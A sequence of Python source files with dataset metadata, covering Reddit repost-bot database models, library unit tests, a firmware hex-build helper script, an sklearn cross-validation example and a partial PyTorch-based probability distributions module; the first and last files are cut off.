repost_response_template = Column(String(2000))\n oc_response_template = Column(String(2000))\n meme_filter = Column(Boolean, default=False)\n title_ignore_keywords = Column(String(200))\n disable_summons_after_auto_response = Column(Boolean, default=False)\n disable_bot_summons = Column(Boolean, default=False)\n only_allow_one_summons = Column(Boolean, default=False)\n remove_additional_summons = Column(Boolean, default=False)\n check_all_submissions = Column(Boolean, default=True)\n check_title_similarity = Column(Boolean, default=False)\n target_title_match = Column(Integer)\n subscribers = Column(Integer, default=0)\n is_mod = Column(Boolean, default=False)\n post_permission = Column(Boolean, default=False)\n wiki_permission = Column(Boolean, default=False)\n wiki_managed = Column(Boolean, default=True)\n check_image_posts = Column(Boolean, default=True)\n check_link_posts = Column(Boolean, default=False)\n check_text_posts = Column(Boolean, default=False)\n check_video_posts = Column(Boolean, default=False)\n target_image_match = Column(Integer, default=92)\n target_image_meme_match = Column(Integer, default=97)\n meme_filter_check_text = Column(Boolean, default=False)\n meme_filter_text_target_match = Column(Integer, default=90)\n only_comment_on_repost = Column(Boolean, default=True)\n report_reposts = Column(Boolean, default=False)\n failed_admin_check_count = Column(Integer, default=0)\n activation_notification_sent = Column(Boolean, default=False)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'active': self.active,\n 'repost_only': self.repost_only,\n 'report_submission': self.report_submission,\n 'report_msg': self.report_msg,\n 'requestor': self.requestor,\n 'added_at': str(self.added_at),\n 'target_hamming': self.target_hamming,\n 'target_annoy': self.target_annoy,\n 'target_days_old': self.target_days_old,\n 'same_sub_only': self.same_sub_only,\n 'filter_crossposts': self.filter_crossposts,\n 'filter_same_author': self.filter_same_author,\n 'remove_repost': self.remove_repost,\n 'removal_reason': self.removal_reason,\n 'lock_post': self.lock_post,\n 'mark_as_oc': self.mark_as_oc,\n 'title_ignore_keywords': self.title_ignore_keywords,\n 'disable_summons_after_auto_response': self.disable_summons_after_auto_response,\n 'disable_bot_summons': self.disable_bot_summons,\n 'only_allow_one_summons': self.only_allow_one_summons,\n 'remove_additional_summons': self.remove_additional_summons,\n 'check_all_submissions': self.check_all_submissions,\n 'check_title_similarity': self.check_title_similarity,\n 'target_title_match': self.target_title_match,\n 'notes': self.notes,\n 'sticky_comment': self.sticky_comment,\n 'repost_response_template': self.repost_response_template,\n 'oc_response_template': self.oc_response_template,\n 'meme_filter': self.meme_filter,\n 'wiki_managed': self.wiki_managed,\n 'check_image_posts': self.check_image_posts,\n 'check_link_posts': self.check_link_posts,\n 'check_video_posts': self.check_video_posts,\n 'check_text_posts': self.check_text_posts,\n 'target_image_match': self.target_image_match,\n 'target_image_meme_match': self.target_image_meme_match,\n 'meme_filter_check_text': self.meme_filter_check_text,\n 'meme_filter_text_target_match': self.meme_filter_text_target_match,\n 'subscribers': self.subscribers,\n 'is_mod': self.is_mod,\n 'wiki_permission': self.wiki_permission,\n 'post_permission': self.post_permission,\n 'only_comment_on_repost': self.only_comment_on_repost,\n 'report_reposts': self.report_reposts,\n 'failed_admin_check_count': self.failed_admin_check_count\n\n }\n\n\n\nclass MonitoredSubChecks(Base):\n __tablename__ = 'reddit_monitored_sub_checked'\n __table_args__ = (\n Index('post_id', 'post_id'),\n )\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n checked_at = Column(DateTime, default=func.utc_timestamp())\n subreddit = Column(String(100))\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'checked_at': self.checked_at.timestamp(),\n 'subreddit': self.subreddit\n }\n\nclass MonitoredSubConfigRevision(Base):\n __tablename__ = 'reddit_monitored_sub_config_revision'\n id = Column(Integer, primary_key=True)\n revision_id = Column(String(36), nullable=False, unique=True)\n revised_by = Column(String(100), nullable=False)\n config = Column(String(1000), nullable=False)\n config_loaded_at = Column(DateTime)\n is_valid = Column(Boolean, default=False)\n notified = Column(Boolean, default=False)\n subreddit = Column(String(100), nullable=False)\n\n\nclass MemeTemplate(Base):\n __tablename__ = 'meme_template'\n id = Column(Integer, primary_key=True)\n dhash_h = Column(String(64))\n dhash_256 = Column(String(256))\n post_id = Column(String(100), nullable=False, unique=True)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'dhash_h': self.dhash_h,\n 'dhash_256': self.dhash_256,\n 'post_id': self.post_id\n }\n\nclass InvestigatePost(Base):\n __tablename__ = 'investigate_post'\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n matches = Column(Integer)\n found_at = Column(DateTime, default=func.utc_timestamp())\n url = Column(String(2000, collation='utf8mb4_general_ci'), nullable=False)\n flag_reason = Column(String(20))\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'matches': self.matches,\n 'found_at': str(self.found_at),\n 'shortlink': f'https://redd.it/{self.post_id}',\n 'url': self.url,\n 'flag_reason': self.flag_reason\n }\n\nclass ImageSearch(Base):\n __tablename__ = 'reddit_image_search'\n __table_args__ = (\n Index('subsearched', 'subreddit', 'source', 'matches_found', unique=False),\n Index('Index 2', 'post_id', unique=False),\n Index('idx_source', 'source', unique=False),\n )\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n source = Column(String(50), nullable=False)\n used_historical_index = Column(Boolean, nullable=False)\n used_current_index = Column(Boolean, nullable=False)\n target_hamming_distance = Column(Integer, nullable=False)\n target_annoy_distance = Column(Float, nullable=False)\n same_sub = Column(Boolean, nullable=False)\n max_days_old = Column(Integer)\n filter_dead_matches = Column(Boolean, nullable=False)\n only_older_matches = Column(Boolean, nullable=False)\n meme_filter = Column(Boolean, nullable=False)\n target_title_match = Column(Integer, nullable=True)\n meme_template_used = Column(Integer)\n search_time = Column(Float, nullable=False)\n index_search_time = Column(Float)\n total_filter_time = Column(Float)\n matches_found = Column(Integer, nullable=False)\n searched_at = Column(DateTime, default=func.utc_timestamp(), nullable=True)\n search_results = Column(Text(75000, collation='utf8mb4_general_ci'))\n subreddit = Column(String(100), nullable=False)\n target_image_match = Column(Integer, default=92)\n target_image_meme_match = Column(Integer, default=97)\n\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'source': self.source,\n 'target_hamming_distance': self.target_hamming_distance,\n 'used_historical_index': self.used_historical_index,\n 'used_current_index': self.used_current_index,\n 'same_sub': self.same_sub,\n 'max_days_old': self.max_days_old,\n 'filter_dead_matches': self.filter_dead_matches,\n 'only_older_matches': self.only_older_matches,\n 'meme_filter': self.meme_filter,\n 'meme_template_used': self.meme_template_used,\n 'search_time': self.search_time,\n 'index_search_time': self.index_search_time,\n 'total_filter_time': self.total_filter_time,\n 'searched_at': self.searched_at.timestamp(),\n 'matches_found': self.matches_found,\n 'subreddit': self.subreddit,\n 'target_image_match': self.target_image_match,\n 'target_image_meme_match': self.target_image_meme_match\n }\n\nclass UserReport(Base):\n __tablename__ = 'reddit_user_report'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n reported_by = Column(String(100), nullable=False)\n post_type = Column(String(15))\n report_type= Column(String(25), nullable=False)\n meme_template = Column(Integer)\n reported_at = Column(DateTime, default=func.utc_timestamp())\n msg_body = Column(String(1000))\n message_id = Column(String(20), nullable=False)\n sent_for_voting = Column(Boolean, default=False)\n\nclass ToBeDeleted(Base):\n __tablename__ = 'to_be_deleted'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n post_type = Column(String(20))\n\nclass BannedSubreddit(Base):\n __tablename__ = 'banned_subreddit'\n id = Column(Integer, primary_key=True)\n subreddit = Column(String(100), nullable=False, unique=True)\n detected_at = Column(DateTime, default=func.utc_timestamp())\n last_checked = Column(DateTime, default=func.utc_timestamp())\n\nclass BannedUser(Base):\n __tablename__ = 'banned_users'\n id = Column(Integer, primary_key=True)\n name = Column(String(100), nullable=False, unique=True)\n reason = Column(String(150), nullable=False)\n banned_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n expires_at = Column(DateTime)\n notes = Column(String(500))\n\nclass StatsGeneral(Base):\n __tablename__ = 'stats_general'\n id = Column(Integer, primary_key=True)\n image_reposts_detected = Column(Integer)\n link_reposts_detected = Column(Integer)\n private_messages_sent = Column(Integer)\n comments_left = Column(Integer)\n summons_received = Column(Integer)\n karma_gained = Column(Integer)\n\nclass StatsTopImageRepost(Base):\n __tablename__ = 'stats_top_image_repost'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False)\n repost_count = Column(Integer, nullable=False)\n days = Column(Integer, nullable=False)\n nsfw = Column(Boolean, nullable=False)\n\n\nclass MonitoredSubConfigChange(Base):\n __tablename__ = 'reddit_monitored_sub_config_change'\n __table_args__ = (\n Index('idx_subreddit', 'subreddit', 'updated_at', unique=False),\n )\n id = Column(Integer, primary_key=True)\n updated_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n updated_by = Column(String(100), nullable=False)\n source = Column(String(10))\n subreddit = Column(String(200), nullable=False)\n config_key = Column(String(100), nullable=False)\n old_value = Column(String(2000))\n new_value = Column(String(2000))\n\nclass ConfigMessageTemplate(Base):\n __tablename__ = 'config_message_templates'\n id = Column(Integer, primary_key=True)\n template_name = Column(String(100), nullable=False, unique=True)\n template_slug = Column(String(100), nullable=False, unique=True)\n template = Column(String(2000), nullable=False)\n created_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n updated_at = Column(DateTime, default=func.utc_timestamp(), onupdate=func.current_timestamp(), nullable=True)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'template_name': self.template_name,\n 'template': self.template,\n 'template_slug': self.template_slug,\n 'created_at': self.created_at.timestamp() if self.created_at else None,\n 'updated_at': self.updated_at.timestamp() if self.created_at else None\n }\n\nclass ConfigSettings(Base):\n __tablename__ = 'config_settings'\n id = Column(Integer, primary_key=True)\n comment_karma_flag_threshold = Column(Integer)\n comment_karma_remove_threshold = Column(Integer)\n index_api = Column(String(150))\n util_api = Column(String(150))\n top_post_offer_watch = Column(Boolean, default=False)\n repost_watch_enabled = Column(Boolean)\n ingest_repost_check_image = Column(Boolean)\n ingest_repost_check_link = Column(Boolean)\n ingest_repost_check_text = Column(Boolean)\n ingest_repost_check_video = Column(Boolean)\n image_repost_target_image_match = Column(Integer)\n image_repost_target_image_meme_match = Column(Integer)\n image_repost_target_annoy_distance = Column(Float)\n\nclass SiteAdmin(Base):\n __tablename__ = 'site_admin'\n id = Column(Integer, primary_key=True)\n user = Column(String(100), nullable=False, unique=True)\n super_user = Column(Boolean, default=False)\n created_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n updated_at = Column(DateTime, default=func.utc_timestamp(), onupdate=func.current_timestamp(), nullable=True)\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'user': self.user,\n 'super_user': self.super_user,\n 'created_at': self.created_at.timestamp() if self.created_at else None,\n 'updated_at': self.updated_at.timestamp() if self.created_at else None\n }\n\n\nclass MemeTemplatePotential(Base):\n __tablename__ = 'meme_template_potential'\n\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=True)\n submitted_by = Column(String(100), nullable=False)\n created_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n vote_total = Column(Integer, nullable=False, default=0)\n\n votes = relationship('MemeTemplatePotentialVote', back_populates='potential_template', cascade=\"all, delete\")\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'submitted_by': self.submitted_by,\n 'vote_total': self.vote_total,\n 'created_at': self.created_at.timestamp() if self.created_at else None,\n 'votes': [vote.to_dict() for vote in self.votes]\n }\n\nclass MemeTemplatePotentialVote(Base):\n __tablename__ = 'meme_template_potential_votes'\n id = Column(Integer, primary_key=True)\n post_id = Column(String(100), nullable=False, unique=False)\n meme_template_potential_id = Column(Integer, ForeignKey('meme_template_potential.id'))\n user = Column(String(100), nullable=False)\n vote = Column(Integer, nullable=False)\n voted_at = Column(DateTime, default=func.utc_timestamp(), nullable=False)\n\n potential_template = relationship(\"MemeTemplatePotential\", back_populates='votes')\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'post_id': self.post_id,\n 'user': self.user,\n 'vote': self.vote,\n 'voted_at': self.voted_at.timestamp() if self.voted_at else None,\n }","sub_path":"redditrepostsleuth/core/db/databasemodels.py","file_name":"databasemodels.py","file_ext":"py","file_size_in_byte":26315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"380618874","text":"import unittest\nfrom pathlib import Path\nfrom rdflib import Literal, URIRef\n\n\nfrom pysbolgraph.terms import SBOL2\nfrom pysbolgraph.SBOL2Graph import SBOL2Graph as Graph\nfrom pysbolgraph.S2Identified import S2Identified\n\n\nclass TestIdentified(unittest.TestCase):\n\n def setUp(self):\n testfile = Path(__file__).parent.parent / \"SBOLTestSuite/SBOL2/pAGM1467.xml\"\n self.graph = Graph()\n self.graph.load(str(testfile))\n self.thing = S2Identified(self.graph, \"http://www.async.ece.utah.edu/pAGM1467\")\n\n def test_getproperty_succeeds(self):\n self.assertEqual(self.thing[SBOL2.displayId], Literal(\"pAGM1467\"))\n\n def test_getproperty_fails_keyerror(self):\n with self.assertRaises(KeyError):\n self.thing[\"nonexistent\"]\n\n def test_getproperty_fails_typerror(self):\n with self.assertRaises(TypeError):\n self.thing[12345]\n\n def test_setproperty_succeeds(self):\n before = self.thing[SBOL2.displayId]\n expected = Literal(\"adisplayid\")\n self.assertNotEqual(expected, before)\n self.thing[SBOL2.displayId] = expected\n after = self.thing[SBOL2.displayId]\n self.assertEqual(expected, after)\n\n\n","sub_path":"test/test_identified.py","file_name":"test_identified.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"595269617","text":"import sys\nimport shutil \nimport fileinput\nimport os\nimport glob\n \ndef deleteHexFiles():\n fileList = glob.glob('./hap2.5.1*/hap2.5.1*.hex', recursive=True)\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n print(\"Error while deleting file : \", filePath)\n\ndef deleteFiles():\n print(os.getcwd())\n fileList = glob.glob('../2.5.11/hamcp2515_*.c')\n fileList.extend(glob.glob('../2.5.11/mv*.h'))\n fileList.extend(glob.glob('../2.5.11/haam*.h'))\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n print(\"Error while deleting file : \", filePath)\n\ndef buildHexFile():\n os.system(\"make clean\")\n os.system(\"make all\")\n\ndef copyFiles(mv,hamcp2515,haam):\n os.chdir(\"../2.5.11/\")\n print(os.getcwd()) \n shutil.copy(os.path.join(os.getcwd(),\"files\",mv), os.getcwd())\n shutil.copy(os.path.join(os.getcwd(),\"files\",hamcp2515), os.getcwd())\n shutil.copy(os.path.join(os.getcwd(),\"files\",haam), os.getcwd())\n\ndef concatFlashAndBootloader():\n for j in range(1,5):\n \n for k in range(1,5):\n\n if k == 1:\n desFolder = \"hap2.5.1\" + str(j) + \"_WithDimmer_WithoutSerial\"\n elif k == 2:\n desFolder = \"hap2.5.1\" + str(j) + \"_WithDimmer_WithSerial\"\n elif k== 3:\n desFolder = \"hap2.5.1\" + str(j) + \"_WithoutDimmer_WithoutSerial\"\n else:\n desFolder = \"hap2.5.1\" + str(j) + \"_WithoutDimmer_WithSerial\"\n\n for l in range(4,6):\n for i in range(15):\n id = hex(int(i))[2:].zfill(1)\n\n f1 = open(desFolder + \"/haEOF.hex\")\n f1_contents = f1.read()\n f1.close()\n\n f2 = open(\"Bootloader/HAPBootLoader-2893\" + str(l) + id + \".hex\")\n f2_contents = f2.read()\n f2.close()\n\n f3 = open(desFolder + \"/\" + desFolder + \"BootLoader-2893\" + str(l) + id + \".hex\", \"w\") # open in `w` mode to write\n f3.write(f1_contents + f2_contents) # concatenate the contents\n f3.close()\n\n#deleteHexFiles()\n\n\ndeleteFiles()\ncopyFiles(\"mv.h\",\"hamcp2515_10kBit.c\",\"haam.h\")\n#buildHexFile()\ndeleteFiles()\n\n#concatFlashAndBootloader()\n\n","sub_path":"firmware/Precompiled_old/BuildHexFiles.py","file_name":"BuildHexFiles.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"359107581","text":"import pytest\n\nfrom great_expectations.core.configuration import AbstractConfig\nfrom great_expectations.data_context.store.store import Store\n\n\n@pytest.mark.unit\ndef test_ge_cloud_response_json_to_object_dict() -> None:\n store = Store()\n data = {\"foo\": \"bar\", \"baz\": \"qux\"}\n assert store.ge_cloud_response_json_to_object_dict(response_json=data) == data\n\n\n@pytest.mark.unit\ndef test_store_name_property_and_defaults() -> None:\n store = Store()\n assert store.store_name == \"no_store_name\"\n\n\n@pytest.mark.unit\ndef test_store_serialize() -> None:\n store = Store()\n value = AbstractConfig(id=\"abc123\", name=\"my_config\")\n assert store.serialize(value) == value\n\n\n@pytest.mark.unit\ndef test_store_deserialize() -> None:\n store = Store()\n value = {\"a\": \"b\"}\n assert store.deserialize(value) == value\n","sub_path":"tests/data_context/store/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"125126847","text":"# 此部分主要計算每次 Accuracy 以及平均 Accuracy.\n__author__ = \"ALEX-CHUN-YU (P76064538@mail.ncku.edu.tw)\"\nfrom sklearn import datasets\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\n\n# 載入 Iris 花朵資料(Four Attribute)\niris = datasets.load_iris()\niris_X = iris.data\niris_y = iris.target\n# 使用 K Nearst Neighbor Alogorithm(Classification)\nknn = KNeighborsClassifier(n_neighbors = 5)\n# 經過 Cross Validation 後所計算出來的分數,將其分為 4 等分\nscores = cross_val_score(knn, iris_X, iris_y, cv = 4, scoring='accuracy')\nprint(\"Accuracy For Each Test:\")\nprint(scores)\nprint(\"Accuracy:\")\nprint(scores.mean())\n","sub_path":"model_evaluation/sklearn_cross_validation_2.py","file_name":"sklearn_cross_validation_2.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"72411810","text":"\"\"\"\nDistributions\n---------\nModule description\n\"\"\"\nfrom abc import ABC, abstractmethod\nfrom collections.abc import Iterable\nimport copy\n\nimport numpy as np\nfrom scipy.special import binom\n\nimport torch\nfrom torch import distributions\n\nfrom brancher.utilities import broadcast_and_squeeze_mixed\nfrom brancher.utilities import broadcast_parent_values\nfrom brancher.utilities import sum_data_dimensions\nfrom brancher.utilities import is_discrete, is_tensor\nfrom brancher.utilities import tensor_range\n\nfrom brancher.config import device\n\n#TODO: We need asserts checking for the right parameters\n\nclass Distribution(ABC):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n pass\n\n def check_parameters(self, **parameters):\n assert all([any([param in parameters for param in parameters_tuple]) if isinstance(parameters_tuple, tuple) else parameters_tuple in parameters\n for parameters_tuple in self.required_parameters])\n\n @abstractmethod\n def _calculate_log_probability(self, x, **parameters):\n pass\n\n @abstractmethod\n def _get_sample(self, **parameters):\n pass\n\n @abstractmethod\n def _preprocess_parameters_for_log_prob(self, x, **parameters):\n pass\n\n @abstractmethod\n def _preprocess_parameters_for_sampling(self, **parameters):\n pass\n\n @abstractmethod\n def _postprocess_sample(self, sample, shape):\n pass\n\n @abstractmethod\n def _postprocess_log_prob(self, log_prob, number_samples, number_datapoints):\n pass\n\n def calculate_log_probability(self, x, **parameters):\n self.check_parameters(**parameters)\n x, parameters, number_samples, number_datapoints = self._preprocess_parameters_for_log_prob(x, **parameters)\n log_prob = self._calculate_log_probability(x, **parameters)\n log_prob = self._postprocess_log_prob(log_prob, number_samples, number_datapoints)\n return sum_data_dimensions(log_prob)\n\n def get_sample(self, **parameters):\n self.check_parameters(**parameters)\n parameters, shape = self._preprocess_parameters_for_sampling(**parameters)\n pre_sample = self._get_sample(**parameters)\n sample = self._postprocess_sample(pre_sample, shape)\n return sample\n\n\nclass ContinuousDistribution(Distribution):\n pass\n\n\nclass DiscreteDistribution(Distribution):\n pass\n\n\nclass UnivariateDistribution(Distribution):\n \"\"\"\n Summary\n \"\"\"\n\n def _preprocess_parameters_for_sampling(self, **parameters):\n parameters = broadcast_and_squeeze_mixed((), parameters)\n return parameters, None\n\n def _preprocess_parameters_for_log_prob(self, x, **parameters):\n tuple_x, parameters = broadcast_and_squeeze_mixed(tuple([x]), parameters)\n return tuple_x[0], parameters, None, None #TODO: add proper output here\n\n def _postprocess_sample(self, sample, shape=None):\n return sample\n\n def _postprocess_log_prob(self, log_prob, number_samples, number_datapoints):\n return log_prob\n\n\nclass ImplicitDistribution(Distribution):\n \"\"\"\n Summary\n \"\"\"\n\n def _preprocess_parameters_for_sampling(self, **parameters):\n return parameters, None\n\n def _preprocess_parameters_for_log_prob(self, x, **parameters):\n return x, parameters, None, None #TODO: add proper output here\n\n def _postprocess_sample(self, sample, shape=None):\n return sample\n\n def _calculate_log_probability(self, x, **parameters):\n return torch.tensor(np.zeros((1,1))).float().to(device) #TODO: Implement some checks here\n\n def _postprocess_log_prob(self, log_pro, number_samples, number_datapoints):\n return log_pro\n\n\nclass VectorDistribution(Distribution):\n \"\"\"\n Summary\n \"\"\"\n def _preproces_vector_input(self, vector_input_dict, vector_names):\n shapes_dict = {par_name: list(par_value.shape)\n for par_name, par_value in vector_input_dict.items()\n if par_name in vector_names}\n reshaped_parameters = {par_name: par_value.contiguous().view(size=(shapes_dict[par_name][0], np.prod(\n shapes_dict[par_name][1:]))) if par_name in vector_names else par_value\n for par_name, par_value in vector_input_dict.items()}\n tensor_shape = list(shapes_dict.values())[0][1:]\n return reshaped_parameters, tensor_shape\n\n def _preprocess_parameters_for_sampling(self, **parameters):\n parameters, number_samples, number_datapoints = broadcast_parent_values(parameters)\n reshaped_parameters, tensor_shape = self._preproces_vector_input(parameters, self.vector_parameters)\n shape = tuple([number_samples, number_datapoints] + tensor_shape)\n return reshaped_parameters, shape\n\n def _preprocess_parameters_for_log_prob(self, x, **parameters):\n parameters_and_data = parameters\n parameters_and_data.update({\"x_data\": x})\n parameters_and_data, number_samples, number_datapoints = broadcast_parent_values(parameters_and_data)\n vector_names = self.vector_parameters\n vector_names.add(\"x_data\")\n reshaped_parameters_and_data, _ = self._preproces_vector_input(parameters_and_data, vector_names)\n x = reshaped_parameters_and_data.pop(\"x_data\")\n return x, reshaped_parameters_and_data, number_samples, number_datapoints\n\n def _postprocess_sample(self, sample, shape):\n return sample.contiguous().view(size=shape)\n\n def _postprocess_log_prob(self, log_pro, number_samples, number_datapoints):\n return log_pro.contiguous().view(size=(number_samples, number_datapoints))\n\n\nclass CategoricalDistribution(VectorDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {(\"p\", \"softmax_p\")}\n self.optional_parameters = {}\n self.vector_parameters = {\"p\", \"softmax_p\"}\n self.matrix_parameters = {}\n self.scalar_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n vector_shape = parameters[\"p\"].shape if \"p\" in parameters else parameters[\"softmax_p\"].shape\n if x.shape == vector_shape and tensor_range(x) == {0, 1}:\n dist = distributions.one_hot_categorical.OneHotCategorical\n else:\n dist = distributions.categorical.Categorical\n\n if \"p\" in parameters:\n log_prob = dist(probs=parameters[\"p\"]).log_prob(x[:, 0])\n\n elif \"softmax_p\" in parameters:\n log_prob = dist(logits=parameters[\"softmax_p\"]).log_prob(x[:, 0])\n\n else:\n raise ValueError(\"Either p or \" +\n \"softmax_p needs to be provided as input\")\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"p\" in parameters:\n sample = distributions.one_hot_categorical.OneHotCategorical(probs=parameters[\"p\"]).sample()\n elif \"softmax_p\" in parameters:\n sample = distributions.one_hot_categorical.OneHotCategorical(logits=parameters[\"softmax_p\"]).sample()\n else:\n raise ValueError(\"Either p or \" +\n \"softmax_p needs to be provided as input\")\n return sample\n\n\nclass MultivariateNormalDistribution(VectorDistribution): #TODO: Work in progress\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", (\"covariance_matrix\", \"precision_matrix\", \"cholesky_factor\")}\n self.optional_parameters = {}\n self.vector_parameters = {\"loc\"}\n self.matrix_parameters = {}\n self.scalar_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"covariance_matrix\" in parameters:\n log_prob = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n covariance_matrix=parameters[\"covariance_matrix\"]).log_prob(x)\n elif \"precision_matrix\" in parameters:\n log_prob = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n precision_matrix=parameters[\"precision_matrix\"]).log_prob(x)\n elif \"cholesky_factor\" in parameters:\n log_prob = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n scale_tril=parameters[\"cholesky_factor\"]).log_prob(x)\n else:\n raise ValueError(\"Either covariance_matrix or precision_matrix or\" +\n \"cholesky_factor needs to be provided as input\")\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"covariance_matrix\" in parameters:\n sample = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n covariance_matrix=parameters[\"covariance_matrix\"]).rsample()\n elif \"precision_matrix\" in parameters:\n sample = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n precision_matrix=parameters[\"precision_matrix\"]).rsample()\n elif \"cholesky_factor\" in parameters:\n sample = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n scale_tril=parameters[\"cholesky_factor\"]).rsample()\n else:\n raise ValueError(\"Either covariance_matrix or precision_matrix or\" +\n \"cholesky_factor needs to be provided as input\")\n return sample\n\n\nclass EmpiricalDistribution(ImplicitDistribution): #TODO: It needs to be reworked.\n \"\"\"\n Summary\n \"\"\"\n def __init__(self, batch_size, is_observed):\n self.required_parameters = {\"dataset\"}\n self.optional_parameters = {\"indices\", \"weights\"}\n self.batch_size = batch_size\n self.is_observed = is_observed\n super().__init__()\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n Returns\n -------\n Without replacement\n \"\"\"\n dataset = parameters[\"dataset\"]\n if \"indices\" not in parameters:\n if \"weights\" in parameters:\n weights = parameters[\"weights\"]\n p = np.array(weights).astype(\"float64\")\n p = p/np.sum(p)\n else:\n p = None\n if is_tensor(dataset):\n if self.is_observed:\n dataset_size = dataset.shape[1]\n else:\n dataset_size = dataset.shape[2]\n else:\n dataset_size = len(dataset)\n if dataset_size < self.batch_size:\n raise ValueError(\"It is impossible to have more samples than the size of the dataset without replacement\")\n if is_discrete(dataset): #\n indices = np.random.choice(range(dataset_size), size=self.batch_size, replace=False, p=p)\n else:\n number_samples = dataset.shape[0]\n indices = [np.random.choice(range(dataset_size), size=self.batch_size, replace=False, p=p)\n for _ in range(number_samples)]\n else:\n indices = parameters[\"indices\"]\n\n if is_tensor(dataset):\n if isinstance(indices, list) and isinstance(indices[0], np.ndarray):\n if self.is_observed:\n sample = torch.cat([dataset[n, k, :].unsqueeze(dim=0) for n, k in enumerate(indices)], dim=0)\n else:\n sample = torch.cat([dataset[n, :, k, :].unsqueeze(dim=0) for n, k in enumerate(indices)], dim=0)\n\n elif isinstance(indices, list) and isinstance(indices[0], (int, np.int32, np.int64)):\n if self.is_observed:\n sample = dataset[:, indices, :]\n else:\n sample = dataset[:, :, indices, :]\n else:\n raise IndexError(\"The indices of an empirical variable should be either a list of integers or a list of arrays\")\n else:\n sample = list(np.array(dataset)[indices])\n return sample\n\n\nclass NormalDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", \"scale\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.normal.Normal(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.normal.Normal(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).rsample()\n\n\nclass LogNormalDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", \"scale\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.log_normal.LogNormal(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.log_normal.LogNormal(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).rsample()\n\n\nclass CauchyDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", \"scale\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n 